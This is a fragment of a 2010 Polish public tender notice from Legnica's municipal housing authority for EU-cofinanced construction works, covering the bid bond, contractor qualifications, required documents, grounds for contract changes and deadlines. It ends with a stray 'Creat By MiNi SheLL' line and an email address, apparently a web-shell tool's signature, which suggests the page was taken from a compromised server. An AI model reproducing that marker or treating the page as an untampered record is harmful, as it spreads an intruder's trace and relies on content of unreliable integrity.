<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 30 000 zł (słownie trzydzieści tysięcy złotych) należy wnieść w terminie do dnia 12 sierpnia 2010 r. do godz. 9.00.
Wadium wnoszone w pieniądzu należy przekazać na konto zamawiającego: Bank Zachodni WBK I/O Legnica 35109020660000000542000052. Wadium winno wpłynąć na konto zamawiającego najpóźniej w dniu 12 sierpnia 2010 r. do godz. 9.00.
Oryginał dokumentu potwierdzającego wniesienie wadium w jednej z pozostałych form ustawowych należy dołączyć do oferty, w sposób umożliwiający zamawiającemu zwrot oryginału dokumentu bez naruszania oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy w ciągu ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali prace w zakresie zamówienia o wartości nie mniejszej niż 200 000 zł z czego  co najmniej po 50000 zł stanowiły odpowiednio roboty sieci wodno - kanalizacyjnych, roboty drogowe, roboty konstrukcyjno - budowlane i roboty instalacji i sieci elektrycznych i elektroenergetycznych - ocena spełnienia warunku odbywać się będzie na podstawie załącznika nr 4 do specyfikacji oraz dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują odpowiednio wykwalifikowanym personelem posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej, w specjalności sanitarnej w zakresie sieci wodociągowych i kanalizacyjnych, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz w specjalności konstrukcyjno-budowlanej. Osoby te powinny należeć do Polskiej Izby Inżynierów Budownictwa. Ocena spełnienia warunku odbywać się będzie na podstawie oświadczenia wg wzoru stanowiącego załącznik nr 3 do specyfikacji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem postępowania na kwotę nie mniejszą niż 150 000 zł - ocena spełnienia warunku odbywać się będzie na podstawie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego fakt posiadania ubezpieczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Jeżeli wykonawca będzie polegał na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia
2.W przypadku spółki z o.o. do oferty należy dołączyć odpis uchwały podjętej stosownie do brzmienia art. 230 k.s.h. lub odpis umowy spółki jeżeli z jej brzmienia wynika, że podjęcie takiej uchwały nie było konieczne - w przypadku gdy cena ofertowa przewyższa dwukrotnie wysokość kapitału zakładowego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje zmiany umowy w następujących przypadkach:
1) Zmiana terminu wykonania umowy:
a) zmiana warunków atmosferycznych uniemożliwiająca wykonywanie robót (temperatura, opady, wiatr), działania sił natury, które zostały uznane na stan klęski żywiołowej, 
przed którymi wykonawca nie mógł w racjonalny sposób poczynić zabezpieczenia,
b) ograniczenia zakresu robót wynikające z braku środków finansowych lub wprowadzeniem zmian istotnych lub nieistotnych w rozumieniu Prawa budowlanego, zmiany w dokumentacji projektowej,
c) konieczność wykonania dodatkowych badań, ekspertyz, analiz itp.,
d) zmiana finansowania robót w poszczególnych latach związana ze zmianą budżetu, otrzymaniem dotacji, pożyczek lub innych środków uzyskanych z zewnątrz,
e) wykonawca przerwał realizację robót i przerwa ta trwa dłużej niż 1 miesiąc,
f) likwidacja lub rozwiązanie firmy,
g) jeżeli w wyniku nieszczęśliwych wypadków dotyczących pracowników i osób trzecich, a powstałych w związku z prowadzonymi robotami budowlanymi, w tym także ruchem pojazdów mechanicznych, nastąpi przerwanie robót.
2) Zmiana zakresu robót:
a) ograniczenia zakresu robót wynikająca z braku środków finansowych lub wprowadzeniem zmian istotnych lub nieistotnych w rozumieniu Prawa budowlanego,
b) konieczność wykonania robót zamiennych,
c) zmiana finansowania robót w poszczególnych latach związana ze zmianą budżetu, otrzymaniem dotacji, pożyczek lub innych środków uzyskanych z zewnątrz,
d) wykonanie prac wynikających z zaleceń organów uprawnionych np. Nadzoru budowlanego, PIP itp.
e) ikwidacja lub rozwiązanie firmy,
f) wykonawca przerwał realizację robót i przerwa ta trwa dłużej niż 1 miesiąc,
3) Zmiana wartości zamówienia
a) w przypadku braku środków finansowych, ich zwiększenia lub zmniejszenia, czego zamawiający nie mógł przewidzieć przy zawieraniu umowy,
b) zmiana finansowania robót w poszczególnych latach związana ze zmianą budżetu, otrzymaniem dotacji, pożyczek lub innych środków uzyskanych z zewnątrz,
c) ograniczenia zakresu robót wynikające z wprowadzenia zmian istotnych lub nieistotnych w rozumieniu Prawa budowlanego, 
d) konieczność wykonania robót zamiennych,
e) likwidacja lub rozwiązanie firmy,
f) wykonawca przerwał realizację robót i przerwa ta trwa dłużej niż 1 miesiąc,
4) Inne:
a) zmiana harmonogramu w zakresie rzeczowo - finansowym z uwzględnieniem zapisów j/w,
b) zmiana inspektora nadzoru, kierownika budowy, kierownika robót, koordynatora prac 
ze strony Zamawiającego,
c) zmiana nr konta wykonawcy lub innych danych podmiotowych,
d) zmiana finansowania robót w poszczególnych latach,
e) zmiany w dokumentacji projektowej.
5) Z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa,
6) Z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla zamawiającego,
7) Z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed zawarciem umowy przez doświadczonego wykonawcę robót,
8) Z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrze, które nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody 
w znacznych rozmiarach,
9) Z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie wynikają z przyczyn leżących po którejkolwiek ze stron.
2. O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów wykonawca winien jest poinformować Zamawiającego pisemnie i natychmiast odnotować to w dzienniku budowy.
3. Strony z powodów, jakie mogą wpływać na zmiany terminów wykonania robót, wyłączają niedogodności związane z pogodą, typową dla okresu wykonania robót w miejscu budowy.
4. Warunkiem zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie w formie aneksu do umowy, pod rygorem nieważności takiej zmiany</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgm.legnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Gospodarki Mieszkaniowej Dział Techniczny, ul. Zielona 7, 59-220 Legnica, pok. nr 306.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2010 godzina 09:00, miejsce: Kancelaria zamawiającego, 59-220 Legnica, ul. Zielona 5, pok. nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie współfinansowane ze środków pochodzących z Unii Europejskiej w ramach projektu Odnowa zdegradowanych obszarów miejskich w rejonie ul. H. Pobożnego- zagospodarowanie oraz utworzenie estetycznych i funkcjonalnych przestrzeni publicznych nr umowy o dofinansowanie UDA-RPDS.09.01.00-02-151/09-00 w ramach Priorytetu nr 9 Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta), Działania nr 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 tysięcy mieszkańców Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com